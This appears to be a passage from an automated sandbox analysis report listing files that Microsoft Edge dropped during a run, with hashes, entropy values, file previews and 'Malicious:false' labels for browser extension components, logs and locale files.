                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b4a0df32-01da-4ec3-8dc1-4719c07b7c4e.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1420
                                                                                                                                                                                                                                                Entropy (8bit):5.389527204967788
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0HG5Eqi0HO05M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5m
                                                                                                                                                                                                                                                MD5:53B135F9A9F504FA0A9AF5CEF85033E7
                                                                                                                                                                                                                                                SHA1:D005ED4D8528D9D925A8C2AFBC89B6750928847E
                                                                                                                                                                                                                                                SHA-256:5766A364BB443FE08DA514300D9F8E818D1F00EBA64E0339DC5C118EB39B8581
                                                                                                                                                                                                                                                SHA-512:4BDFAD08D5765F5D1DCBFDF308D54E0BC319FCA6BBC8CA777B20A7D7D05B8224130BC2A21FB79DDAA858A01126F2A706CD6B2FA08177DA96CF0CCAA3CE3DF246
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_1411530604\3785b344-19ba-437c-8a9d-b3ffdc1bb163.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_1411530604\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_1411530604\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_1411530604\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_1411530604\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\4172ca52-b52a-4916-a309-4fc67d601a4e.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

